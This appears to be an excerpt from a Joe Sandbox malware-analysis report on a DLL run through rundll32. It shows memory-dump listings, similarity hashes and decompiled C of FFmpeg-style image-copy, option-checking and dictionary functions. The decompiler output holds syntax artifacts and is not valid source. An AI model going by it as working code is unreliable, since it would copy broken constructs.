Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_mallocz$mv_buffer_ref$mv_channel_layout_check$mv_buffer_createmv_buffer_unrefmv_callocmv_frame_allocmv_frame_freemv_frame_refmv_malloc
String ID:
API String ID: 2471893243-0
Opcode ID: 50673311061d5e9090930dd3f83a2bf224b626f2df663858ce286107a4d00b9a
Instruction ID: e44850cc1d663ee6b079855d6d5ccf767aeb5a2a45f4db7414dc8b10b7331849
Opcode Fuzzy Hash: 50673311061d5e9090930dd3f83a2bf224b626f2df663858ce286107a4d00b9a
Instruction Fuzzy Hash: EA21B3745087458FD780EF29C58021EFBE0EF89350F51892DFA988B346EB74E881CB92

Uniqueness

Uniqueness Score: -1.00%

Function 10022610 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 344
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E10022610(void* __eflags, signed int _a4, char _a8, char* _a12, char _a16, intOrPtr _a20, int _a24, signed int _a28) {
				char* _v16;
				char* _v20;
				intOrPtr _v24;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				intOrPtr _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed char* _v88;
				int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				intOrPtr _v120;
				char* _v124;
				char* _v128;
				char* _v132;
				int _v136;
				intOrPtr* _t175;
				signed int _t177;
				signed int _t179;
				int _t184;
				signed int _t185;
				signed char _t194;
				void* _t197;
				signed int _t198;
				void* _t199;
				signed int _t200;
				void* _t201;
				signed int _t202;
				void* _t203;
				signed char _t206;
				signed int _t209;
				signed int _t210;
				void* _t211;
				void* _t213;
				void* _t219;
				signed int _t223;
				signed int _t224;
				signed int _t225;
				int _t226;
				signed int _t229;
				signed int _t230;
				signed int _t231;
				int _t235;
				signed int _t239;
				signed int _t243;
				signed int _t244;
				int _t254;
				signed int _t258;
				intOrPtr* _t259;
				int _t267;
				intOrPtr* _t271;
				signed int _t279;
				signed int _t280;
				void* _t282;
				void* _t283;
				signed char _t284;
				intOrPtr* _t285;
				intOrPtr _t287;
				void* _t291;
				signed int _t295;
				void* _t296;
				signed int _t301;
				void* _t304;
				signed int _t306;
				void* _t308;
				signed int _t314;
				signed int _t315;
				void _t316;
				signed int _t317;
				signed int _t319;
				void _t320;
				void* _t321;
				intOrPtr* _t322;
				void* _t324;
				signed int* _t325;

				_t322 = _t321 - 0x7c;
				_t271 = _a8;
				_t287 = _a20;
				_v88 = _a4;
				_v92 = _a24;
				_v60 =  *_t271;
				_v84 = _a12;
				_t175 = _a16;
				_v96 = _a28;
				_v56 =  *((intOrPtr*)(_t271 + 4));
				_v52 =  *((intOrPtr*)(_t271 + 8));
				_v48 =  *((intOrPtr*)(_t271 + 0xc));
				_v44 =  *_t175;
				_v40 =  *((intOrPtr*)(_t175 + 4));
				_v36 =  *((intOrPtr*)(_t175 + 8));
				_v32 =  *((intOrPtr*)(_t175 + 0xc));
				 *_t322 = _t287;
				_t177 = L10034790(_t219);
				_v68 = _t177;
				if(_t177 == 0) {
					L17:
					return _t177;
				} else {
					_t223 = _t177;
					_t177 =  *(_t177 + 8);
					if((_t177 & 0x00000008) != 0) {
						goto L17;
					} else {
						_t177 = _t177 & 0x00000002;
						if(_t177 == 0) {
							_t279 =  *(_t223 + 4) & 0x000000ff;
							__eflags = _t279;
							if(_t279 == 0) {
								goto L17;
							} else {
								_t179 =  *((intOrPtr*)(_t223 + 0x10));
								_t239 = _t223;
								_v108 = _t179;
								_t224 = _t179 + 1;
								__eflags = _t224;
								_t177 =  >=  ? _t224 : 0;
								__eflags = _t279 - 1;
								_v80 = _t177;
								_t225 = _t177;
								if(_t279 != 1) {
									_t198 =  *((intOrPtr*)(_t239 + 0x24));
									_v108 = _t198;
									_t199 = _t198 + 1;
									__eflags = _t225 - _t199;
									_t177 =  >=  ? _t225 : _t199;
									__eflags = _t279 - 2;
									_v80 = _t177;
									_t229 = _t177;
									if(_t279 != 2) {
										_t200 =  *((intOrPtr*)(_t239 + 0x38));
										_v108 = _t200;
										_t201 = _t200 + 1;
										__eflags = _t229 - _t201;
										_t177 =  >=  ? _t229 : _t201;
										__eflags = _t279 - 3;
										_v80 = _t177;
										_t230 = _t177;
										if(_t279 != 3) {
											_t202 =  *((intOrPtr*)(_t239 + 0x4c));
											_v108 = _t202;
											_t203 = _t202 + 1;
											__eflags = _t230 - _t203;
											_t177 =  >=  ? _t230 : _t203;
											_v80 = _t177;
										}
									}
								}
								__eflags = _v80;
								if(_v80 == 0) {
									goto L17;
								} else {
									_t301 = 0;
									__eflags = 0;
									_v64 =  ~_v96;
									while(1) {
										_v132 = _t301;
										 *_t322 = _t287;
										_v136 = _v92;
										_t184 = E10021480(__eflags);
										__eflags = _t184;
										_t226 = _t184;
										if(_t184 < 0) {
											break;
										}
										_t73 = _t301 - 1; // -1
										__eflags = _t73 - 1;
										_v104 = _v96;
										if(_t73 <= 1) {
											_v104 =  ~(_v64 >> ( *(_v68 + 6) & 0x000000ff));
										}
										_t314 =  *(_t322 + 0x50 + _t301 * 4);
										_v108 =  *((intOrPtr*)(_t322 + 0x60 + _t301 * 4));
										_t282 =  *(_v84 + _t301 * 4);
										_t194 =  *(_v88 + _t301 * 4);
										__eflags = _t194;
										if(_t194 != 0) {
											__eflags = _t282;
											if(_t282 != 0) {
												_t249 =  <  ? _v108 :  ~_v108;
												__eflags = _t226 - ( <  ? _v108 :  ~_v108);
												if(_t226 > ( <  ? _v108 :  ~_v108)) {
													goto L62;
												}
												_t252 =  <  ? _t314 :  ~_t314;
												__eflags = _t226 - ( <  ? _t314 :  ~_t314);
												if(_t226 > ( <  ? _t314 :  ~_t314)) {
													goto L64;
												}
												__eflags = _v104;
												if(_v104 > 0) {
													_v100 = _t314;
													_v76 = _t301;
													_v72 = _t287;
													goto L34;
													L34:
													__eflags = _t226 - 8;
													_t254 = _t226;
													_t291 = _t194;
													_t304 = _t282;
													if(_t226 >= 8) {
														__eflags = _t194 & 0x00000001;
														if((_t194 & 0x00000001) != 0) {
															_t291 = _t194 + 1;
															_t304 = _t282 + 1;
															 *_t194 =  *_t282 & 0x000000ff;
															_t112 = _t226 - 1; // -1
															_t254 = _t112;
														}
														__eflags = _t291 & 0x00000002;
														if((_t291 & 0x00000002) != 0) {
															_t315 =  *_t304 & 0x0000ffff;
															_t291 = _t291 + 2;
															_t304 = _t304 + 2;
															_t254 = _t254 - 2;
															 *(_t291 - 2) = _t315;
														}
														__eflags = _t291 & 0x00000004;
														if((_t291 & 0x00000004) != 0) {
															_t316 =  *_t304;
															_t291 = _t291 + 4;
															_t304 = _t304 + 4;
															_t254 = _t254 - 4;
															 *(_t291 - 4) = _t316;
														}
													}
													_t197 = memcpy(_t291, _t304, _t254);
													_t322 = _t322 + 0xc;
													_t194 = _t197 + _v100;
													_t282 = _t282 + _v108;
													_t96 =  &_v104;
													 *_t96 = _v104 - 1;
													__eflags =  *_t96;
													if( *_t96 == 0) {
														_t301 = _v76;
														_t287 = _v72;
													} else {
														goto L34;
													}
												}
											}
										}
										_t177 = _v80;
										_t301 = _t301 + 1;
										__eflags = _t301 - _t177;
										if(__eflags != 0) {
											continue;
										} else {
											goto L17;
										}
										goto L75;
									}
									_a12 = "av_image_get_linesize failed\n";
									_a8 = 0x10;
									_a4 = 0;
									_t324 = _t322 + 0x7c;
									_t325 = _t324 - 0x1c;
									_t185 = _a4;
									_t280 =  *0x100ad010;
									__eflags = _t185;
									if(_t185 != 0) {
										_t243 =  *_t185;
										__eflags = _t243;
										if(_t243 != 0) {
											__eflags =  *((intOrPtr*)(_t243 + 0xc)) - 0x320f01;
											if( *((intOrPtr*)(_t243 + 0xc)) > 0x320f01) {
												_t244 =  *(_t243 + 0x10);
												__eflags = _t244;
												if(_t244 != 0) {
													__eflags = _a8 - 7;
													if(_a8 > 7) {
														_t165 =  &_a8;
														 *_t165 = _a8 +  *((intOrPtr*)(_t185 + _t244));
														__eflags =  *_t165;
													}
												}
											}
										}
									}
									__eflags = _t280;
									if(_t280 != 0) {
										 *_t325 = _t185;
										_v16 =  &_a16;
										_v20 = _a12;
										_v24 = _a8;
										_t185 =  *_t280();
									}
									return _t185;
								}
							}
						} else {
							_t317 = _v44;
							_t231 = _v60;
							_t283 =  *_v84;
							_t206 =  *_v88;
							if(_t206 == 0 || _t283 == 0) {
								L42:
								_t258 =  *(_v84 + 4);
								_t284 = _v88[4];
								goto L43;
							} else {
								_t262 =  <  ? _t317 :  ~_t317;
								_t333 = _v92 - ( <  ? _t317 :  ~_t317);
								if(_v92 > ( <  ? _t317 :  ~_t317)) {
									L62:
									_v120 = 0x15e;
									_v124 = "libavutil/imgutils.c";
									_v128 = "((src_linesize) >= 0 ? (src_linesize) : (-(src_linesize))) >= bytewidth";
									L63:
									 *_t322 = 0;
									_v132 = "Assertion %s failed at %s:%d\n";
									__eflags = 0;
									_v136 = 0;
									L66();
									abort();
									L64:
									_v120 = 0x15f;
									_v124 = "libavutil/imgutils.c";
									_v128 = "((dst_linesize) >= 0 ? (dst_linesize) : (-(dst_linesize))) >= bytewidth";
									goto L63;
								}
								_t265 =  <  ? _t231 :  ~_t231;
								_t334 = _v92 - ( <  ? _t231 :  ~_t231);
								if(_v92 > ( <  ? _t231 :  ~_t231)) {
									goto L64;
								}
								if(_v96 <= 0) {
									goto L42;
								} else {
									_v104 = _t231;
									_t235 = _v92;
									_v108 = _t317;
									do {
										_t267 = _t235;
										_t296 = _t206;
										_t308 = _t283;
										if(_t235 >= 8) {
											if((_t206 & 0x00000001) != 0) {
												_t296 = _t206 + 1;
												_t308 = _t283 + 1;
												 *_t206 =  *_t283 & 0x000000ff;
												_t267 = _t235 - 1;
											}
											if((_t296 & 0x00000002) != 0) {
												_t319 =  *_t308 & 0x0000ffff;
												_t296 = _t296 + 2;
												_t308 = _t308 + 2;
												_t267 = _t267 - 2;
												 *(_t296 - 2) = _t319;
											}
											if((_t296 & 0x00000004) != 0) {
												_t320 =  *_t308;
												_t296 = _t296 + 4;
												_t308 = _t308 + 4;
												_t267 = _t267 - 4;
												 *(_t296 - 4) = _t320;
											}
										}
										_t213 = memcpy(_t296, _t308, _t267);
										_t322 = _t322 + 0xc;
										_t206 = _t213 + _v104;
										_t283 = _t283 + _v108;
										_t40 =  &_v96;
										 *_t40 = _v96 - 1;
									} while ( *_t40 != 0);
									_t284 = _v88[4];
									_t177 =  *(_v68 + 8) & 0x00000002;
									__eflags = _t177;
									if(_t177 != 0) {
										_t258 =  *(_v84 + 4);
										goto L43;
									} else {
										__eflags = _t284;
										if(_t284 != 0) {
											_t177 = _v84;
											_t258 =  *(_t177 + 4);
											__eflags = _t258;
											if(_t258 != 0) {
												L43:
												__eflags = _t284 & 0x00000001;
												_t306 = 0x400;
												if((_t284 & 0x00000001) != 0) {
													_t209 =  *_t258 & 0x000000ff;
													_t284 = _t284 + 1;
													_t258 = _t258 + 1;
													_t306 = 0x3ff;
													 *(_t284 - 1) = _t209;
												}
												__eflags = _t284 & 0x00000002;
												if((_t284 & 0x00000002) != 0) {
													_t210 =  *_t258 & 0x0000ffff;
													_t284 = _t284 + 2;
													_t258 = _t258 + 2;
													_t306 = _t306 - 2;
													 *(_t284 - 2) = _t210;
												}
												_t211 = 0;
												_t295 = _t306 & 0xfffffff8;
												__eflags = _t295;
												do {
													 *((intOrPtr*)(_t284 + _t211)) =  *((intOrPtr*)(_t258 + _t211));
													 *((intOrPtr*)(_t284 + _t211 + 4)) =  *((intOrPtr*)(_t258 + _t211 + 4));
													_t211 = _t211 + 8;
													__eflags = _t211 - _t295;
												} while (_t211 < _t295);
												_t285 = _t284 + _t211;
												_t259 = _t258 + _t211;
												_t177 = 0;
												__eflags = _t306 & 0x00000004;
												if((_t306 & 0x00000004) != 0) {
													 *_t285 =  *_t259;
													_t177 = 4;
												}
												__eflags = _t306 & 0x00000002;
												if((_t306 & 0x00000002) != 0) {
													 *((short*)(_t285 + _t177)) =  *(_t259 + _t177) & 0x0000ffff;
													_t177 = _t177 + 2;
													__eflags = _t177;
												}
												__eflags = _t306 & 0x00000001;
												if((_t306 & 0x00000001) != 0) {
													 *((char*)(_t285 + _t177)) =  *(_t259 + _t177) & 0x000000ff;
												}
											} else {
											}
										}
									}
								}
							}
							goto L17;
						}
					}
				}
				L75:
			}

0x10022614
0x10022617
0x1002262c
0x10022635
0x10022640
0x1002264b
0x10022652
0x10022656
0x1002265d
0x10022661
0x1002266b
0x1002266f
0x10022675
0x1002267c
0x10022686
0x1002268a
0x1002268e
0x10022691
0x10022696
0x1002269c
0x10022795
0x1002279c
0x100226a2
0x100226a2
0x100226a4
0x100226af
0x00000000
0x100226b5
0x100226b8
0x100226bb
0x100227a0
0x100227a4
0x100227a6
0x00000000
0x100227a8
0x100227a8
0x100227ab
0x100227ad
0x100227b1
0x100227b6
0x100227b8
0x100227bb
0x100227be
0x100227c2
0x100227c4
0x100227c6
0x100227c9
0x100227cd
0x100227ce
0x100227d0
0x100227d3
0x100227d6
0x100227da
0x100227dc
0x100227de
0x100227e1
0x100227e5
0x100227e6
0x100227e8
0x100227eb
0x100227ee
0x100227f2
0x100227f4
0x100227f6
0x100227f9
0x100227fd
0x100227fe
0x10022800
0x10022803
0x10022803
0x100227f4
0x100227dc
0x1002280b
0x1002280d
0x00000000
0x1002280f
0x10022813
0x10022813
0x10022817
0x10022820
0x10022820
0x10022828
0x1002282b
0x1002282f
0x10022834
0x10022836
0x10022838
0x00000000
0x00000000
0x10022842
0x10022845
0x10022848
0x1002284c
0x10022920
0x10022920
0x10022856
0x1002285a
0x10022862
0x10022869
0x1002286c
0x1002286e
0x10022874
0x10022876
0x10022882
0x10022887
0x10022889
0x00000000
0x00000000
0x10022893
0x10022896
0x10022898
0x00000000
0x00000000
0x100228a2
0x100228a4
0x100228aa
0x100228ae
0x100228b2
0x100228b6
0x100228d8
0x100228d8
0x100228db
0x100228dd
0x100228df
0x100228e1
0x100228e3
0x100228e5
0x1002294b
0x1002294e
0x10022951
0x10022953
0x10022953
0x10022953
0x100228e7
0x100228ed
0x10022930
0x10022933
0x10022936
0x10022939
0x1002293c
0x1002293c
0x100228ef
0x100228f5
0x100228f7
0x100228f9
0x100228fc
0x100228ff
0x10022902
0x10022902
0x100228f5
0x100228c0
0x100228c0
0x100228ca
0x100228cc
0x100228ce
0x100228ce
0x100228ce
0x100228d2
0x10022780
0x10022784
0x00000000
0x00000000
0x00000000
0x100228d2
0x100228a4
0x10022876
0x10022788
0x1002278c
0x1002278d
0x1002278f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x1002278f
0x10022a20
0x10022a29
0x10022a30
0x10022a37
0x10026560
0x10026563
0x10026567
0x1002656d
0x1002656f
0x10026571
0x10026573
0x10026575
0x10026577
0x1002657e
0x10026580
0x10026583
0x10026585
0x10026587
0x1002658c
0x10026591
0x10026591
0x10026591
0x10026591
0x1002658c
0x10026585
0x1002657e
0x10026575
0x100265a0
0x100265a2
0x100265a4
0x100265ab
0x100265b3
0x100265bb
0x100265bf
0x100265bf
0x100265c4
0x100265c4
0x1002280d
0x100226c1
0x100226c5
0x100226c9
0x100226cd
0x100226d3
0x100226d7
0x10022958
0x1002295c
0x10022963
0x00000000
0x100226e5
0x100226e9
0x100226ec
0x100226f0
0x10022a92
0x10022a92
0x10022a9a
0x10022aa2
0x10022aaa
0x10022aaa
0x10022ab6
0x10022aba
0x10022abc
0x10022ac0
0x10022ac5
0x10022aca
0x10022aca
0x10022ad2
0x10022ada
0x00000000
0x10022ada
0x100226fa
0x100226fd
0x10022701
0x00000000
0x00000000
0x1002270d
0x00000000
0x10022713
0x10022713
0x10022717
0x1002271b
0x10022740
0x10022743
0x10022745
0x10022747
0x10022749
0x1002274d
0x10022a5b
0x10022a5e
0x10022a61
0x10022a63
0x10022a63
0x10022759
0x10022a43
0x10022a46
0x10022a49
0x10022a4c
0x10022a4f
0x10022a4f
0x10022765
0x10022767
0x10022769
0x1002276c
0x1002276f
0x10022772
0x10022772
0x10022765
0x10022728
0x10022728
0x10022732
0x10022734
0x10022736
0x10022736
0x10022736
0x100229e4
0x100229f1
0x100229f1
0x100229f4
0x10022ae8
0x00000000
0x100229fa
0x100229fa
0x100229fc
0x10022a02
0x10022a06
0x10022a09
0x10022a0b
0x10022966
0x10022966
0x10022969
0x1002296e
0x10022a80
0x10022a83
0x10022a84
0x10022a85
0x10022a8a
0x10022a8a
0x10022974
0x10022977
0x10022a6b
0x10022a6e
0x10022a71
0x10022a74
0x10022a77
0x10022a77
0x1002297f
0x10022981
0x10022981
0x10022984
0x1002298b
0x1002298e
0x10022992
0x10022995
0x10022995
0x10022999
0x1002299b
0x1002299d
0x1002299f
0x100229a5
0x100229a9
0x100229ab
0x100229ab
0x100229b0
0x100229b6
0x100229bc
0x100229c0
0x100229c0
0x100229c0
0x100229c3
0x100229c6
0x100229d0
0x100229d0
0x00000000
0x10022a11
0x10022a0b
0x100229fc
0x100229f4
0x1002270d
0x00000000
0x100226d7
0x100226bb
0x100226af
0x00000000

APIs

mv_pix_fmt_desc_get.F086 ref: 10022691
mv_image_get_linesize.F086 ref: 1002282F
mv_log.F086 ref: 10022AC0
abort.MSVCRT ref: 10022AC5

Strings

Assertion %s failed at %s:%d, xrefs: 10022AB1
av_image_get_linesize failed, xrefs: 10022A16

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: abortmv_image_get_linesizemv_logmv_pix_fmt_desc_get
String ID: Assertion %s failed at %s:%d$av_image_get_linesize failed
API String ID: 1423692287-2525362290
Opcode ID: 3ba8b928b0e2e591675b6da61631b884aeed625d3802fe22cac3d10d96b15f9a
Instruction ID: a2789ba4896ffccc60d1fb11a9358e28422a5f1174f25c27da114458ab982159
Opcode Fuzzy Hash: 3ba8b928b0e2e591675b6da61631b884aeed625d3802fe22cac3d10d96b15f9a
Instruction Fuzzy Hash: 59D1AC75A093519FC354CF68D080A2AFBF1FF88354F96896DE8899B311E735E981CB42

Uniqueness

Uniqueness Score: -1.00%

Function 1002D1D2 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 206COMMON

Download Yara Rule

APIs

Part of subcall function 1002B8B0: strcmp.MSVCRT ref: 1002B8E8
Part of subcall function 1002B8B0: strcmp.MSVCRT ref: 1002B908

mv_log.F086 ref: 1002D38B
mv_log.F086 ref: 1002D4D3

Strings

Value %f for parameter '%s' is not a valid set of 32bit integer flags, xrefs: 1002D500
Value %f for parameter '%s' out of range [%g - %g], xrefs: 1002D4B3
The value set by option '%s' is not a video rate., xrefs: 1002D379

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_logstrcmp
String ID: The value set by option '%s' is not a video rate.$Value %f for parameter '%s' is not a valid set of 32bit integer flags$Value %f for parameter '%s' out of range [%g - %g]
API String ID: 3828882664-184275398
Opcode ID: 9048f1d3171aae043673fb0fdbe3cfab101bd8445a56e714e4be4b6e8c8ac588
Instruction ID: d45a10e71e14beca1d3a191c2c2f45444891420c3d6d5d391c48b5bc7296f499
Opcode Fuzzy Hash: 9048f1d3171aae043673fb0fdbe3cfab101bd8445a56e714e4be4b6e8c8ac588
Instruction Fuzzy Hash: A281A135908B458FC341EF29E48011BFBE5FFD62E0FA0975AF89A6B260D7319881C742

Uniqueness

Uniqueness Score: -1.00%

Function 10030430 Relevance: 10.7, APIs: 7, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 800b1406a6777d3b0a110f8a2bafff3ed093b576a6716a7b0ba2b2e8c81d1b2c
Instruction ID: 3912d89886b32ab3c0e056b5cdab389be67126b87d12ef53d502f4ae6e2b42f2
Opcode Fuzzy Hash: 800b1406a6777d3b0a110f8a2bafff3ed093b576a6716a7b0ba2b2e8c81d1b2c
Instruction Fuzzy Hash: 057157B560A7028FC756CF28C0A062BB7E1EF94681F21892DF8D58F255D731ED45CB82

Uniqueness

Uniqueness Score: -1.00%

Function 10023180 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

mv_pix_fmt_desc_get.F086 ref: 1002319F
mv_image_get_linesize.F086 ref: 100231D4

Part of subcall function 10021480: mv_pix_fmt_desc_get.F086(?,?,?,?,?,?,?,?,?,?,00000000,?,100B6C20,00000000,10022208), ref: 10021496

mv_image_fill_linesizes.F086(?), ref: 10023268
mv_image_fill_plane_sizes.F086(?), ref: 100232CB

Strings

Picture size %ux%u is invalid, xrefs: 1002331F

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_pix_fmt_desc_get$mv_image_fill_linesizesmv_image_fill_plane_sizesmv_image_get_linesize
String ID: Picture size %ux%u is invalid
API String ID: 3680373976-1963597007
Opcode ID: 07e5c2be4807f6978617a4492a07696999ca7ae4d9d795ec3814173b8ca04270
Instruction ID: 42873512ec11e61a891db32c639e21bb7bc2094a7c171237446aa949f8b4b16f
Opcode Fuzzy Hash: 07e5c2be4807f6978617a4492a07696999ca7ae4d9d795ec3814173b8ca04270
Instruction Fuzzy Hash: 80513576A083418BC384CF69D88064EBBE2EFC8750F55CA3EE598C7350EA75DA448B42

Uniqueness

Uniqueness Score: -1.00%

Function 100121A0 Relevance: 10.6, APIs: 7, Instructions: 119
COMMON

Download Yara Rule

C-Code - Quality: 26%

			E100121A0(intOrPtr* _a4, signed int* _a8, char _a12, char _a16) {
				char _v1052;
				char _v1053;
				char _v1054;
				char _v1055;
				char _v1072;
				char _v1076;
				intOrPtr _v1100;
				intOrPtr _v1104;
				intOrPtr _v1108;
				signed int* _v1112;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t41;
				signed int _t43;
				signed int _t47;
				void* _t62;
				char* _t63;
				intOrPtr* _t65;
				char _t67;
				signed int* _t71;
				void* _t72;
				intOrPtr* _t74;
				void* _t77;
				char* _t78;
				intOrPtr* _t79;

				_t79 =  &_v1100;
				_t71 = _a8;
				_t41 = _a12;
				_v1053 = 0;
				_t67 = _a16;
				_t74 = _a4;
				_v1072 = _t41;
				_v1076 = _t67;
				_v1055 = _t67;
				_v1054 = _t41;
				if(_t71 == 0 || _t67 == 0 || _t41 == 0 || _t67 == _t41 || _t67 == 0x5c || _t41 == 0x5c) {
					return 0xffffffea;
				}
				if(_t74 == 0 ||  *_t74 == 0) {
					 *_t79 = 0x100b4205;
					_t43 = E100292E0(_t62, _t71, _t74, _t77);
					 *_t71 = _t43;
					asm("sbb eax, eax");
					return _t43 & 0xfffffff4;
				}
				_v1108 = 0xffffffff;
				_t63 =  &_v1052;
				_v1112 = 0x40;
				_t78 =  &_v1055;
				 *_t79 = _t63;
				L10008880(_t63, _t71, _t74, _t78);
				_t47 = 0;
				_t65 = _t74;
				_a8 = _t71;
				_t72 = 0;
				if( *_t65 > 0) {
					while(1) {
						_t74 =  *((intOrPtr*)(_t65 + 4)) + _t47 * 8;
						if(_t74 == 0) {
							goto L14;
						}
						if(_t72 != 0) {
							 *_t79 = _t63;
							_v1108 = 1;
							_v1112 =  &_v1076;
							_a4 = _t65;
							L10008F30();
							_t65 = _a4;
						}
						_v1108 = _t78;
						_v1104 = 1;
						_t72 = _t72 + 1;
						_v1100 = 0;
						_a4 = _t65;
						 *_t79 = _t63;
						_v1112 =  *_t74;
						L10009730();
						_v1108 = 1;
						_v1112 =  &_v1072;
						 *_t79 = _t63;
						L10008F30();
						_v1100 = 0;
						_v1104 = 1;
						_v1108 = _t78;
						 *_t79 = _t63;
						_v1112 =  *((intOrPtr*)(_t74 + 4));
						L10009730();
						_t65 = _a4;
						_t47 = _t74 + 1;
						if( *_t65 > _t47) {
							continue;
						}
						goto L14;
					}
				}
				L14:
				 *_t79 = _t63;
				_v1112 = _a8;
				return E10009690(_t63, _t65, _a8, _t74);
			}

0x100121a4
0x100121aa
0x100121b1
0x100121b8
0x100121bd
0x100121c4
0x100121cd
0x100121d1
0x100121d5
0x100121d9
0x100121dd
0x00000000
0x10012360
0x10012210
0x10012218
0x1001221f
0x10012224
0x10012229
0x00000000
0x1001222b
0x1001224a
0x1001224e
0x10012252
0x10012256
0x1001225a
0x1001225d
0x10012262
0x10012264
0x10012266
0x10012271
0x10012273
0x10012279
0x1001227c
0x10012281
0x00000000
0x00000000
0x10012289
0x10012330
0x10012338
0x10012340
0x10012344
0x1001234b
0x10012350
0x10012350
0x1001228f
0x1001229a
0x1001229e
0x1001229f
0x100122a3
0x100122ac
0x100122af
0x100122b3
0x100122c1
0x100122c5
0x100122c9
0x100122cc
0x100122d3
0x100122dc
0x100122e0
0x100122e7
0x100122ea
0x100122ee
0x100122f3
0x10012302
0x10012307
0x00000000
0x00000000
0x00000000
0x10012307
0x10012279
0x1001230d
0x1001230d
0x10012317
0x1001232a

APIs

mv_strdup.F086 ref: 1001221F
